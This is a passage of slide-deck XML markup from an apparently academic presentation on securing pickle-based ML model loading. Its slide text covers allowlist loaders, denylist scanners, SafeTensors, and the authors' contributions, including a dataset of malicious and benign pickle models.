              <a:rPr lang="en"/>
              <a:t>Existing ML Pickle Security Solutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p45"/>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516" name="Google Shape;516;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480375" y="3339550"/>
            <a:ext cx="7177200" cy="632100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Restricted loaders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>only permit safe callables with restrictive </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The Weights </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Only Unpickler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>is default in PyTorch 2.6.</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Google Shape;517;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1480375" y="2237831"/>
            <a:ext cx="7177200" cy="602100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model scanners </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>analyze models to identify unsafe callables applying a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>denylist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Hugging Face deploys multiple model scanners, but policies are incomplete.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494774" y="1049110"/>
            <a:ext cx="7162800" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Alternate formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>with less expressive representations are recommended. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>SafeTensors was designed for security.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Google Shape;519;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2203701"/>
            <a:ext cx="519894" cy="499831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="520" name="Google Shape;520;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2203722"/>
            <a:ext cx="519900" cy="499800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="15750">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="75550" lIns="75550" spcFirstLastPara="1" rIns="75550" wrap="square" tIns="75550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1156"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="Google Shape;521;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491577" y="2203711"/>
            <a:ext cx="519894" cy="499831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="522" name="Google Shape;522;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="593545" y="2242993"/>
            <a:ext cx="722933" cy="722933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514406" y="3427598"/>
            <a:ext cx="474300" cy="456000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="14350">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68925" lIns="68925" spcFirstLastPara="1" rIns="68925" wrap="square" tIns="68925">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1055"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="524" name="Google Shape;524;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514415" y="3427588"/>
            <a:ext cx="474232" cy="455953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="525" name="Google Shape;525;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="342987" y="3294087"/>
            <a:ext cx="817070" cy="722922"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;526;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="462775" y="1124431"/>
            <a:ext cx="474300" cy="336319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="527" name="Google Shape;527;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937076" y="1124425"/>
            <a:ext cx="336325" cy="336325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="528" name="Google Shape;528;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="736350" y="1460750"/>
            <a:ext cx="437336" cy="39360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2" name="Shape 532"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="533" name="Google Shape;533;p46"/>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534" name="Google Shape;534;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="1512841"/>
            <a:ext cx="6575100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Google Shape;535;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Google Shape;536;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284525" y="2657550"/>
            <a:ext cx="2027100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Q1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Is this a problem?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Google Shape;537;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5832525" y="2657550"/>
            <a:ext cx="2027100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Q2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How do we fix it? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9E9E9E"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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4" name="Shape 294"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Contributions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;p29"/>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298" name="Google Shape;298;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194450" y="1228600"/>
            <a:ext cx="6755100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Study</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> of model serialization formats in the Hugging Face model ecosystem.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Google Shape;299;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194450" y="2352750"/>
            <a:ext cx="6755100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Secure pickle model loading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> with library-specific policies.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194450" y="3476900"/>
            <a:ext cx="6755100" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Dataset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> of &gt;300 malicious and benign pickle-based models and programs.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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1" name="Shape 541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
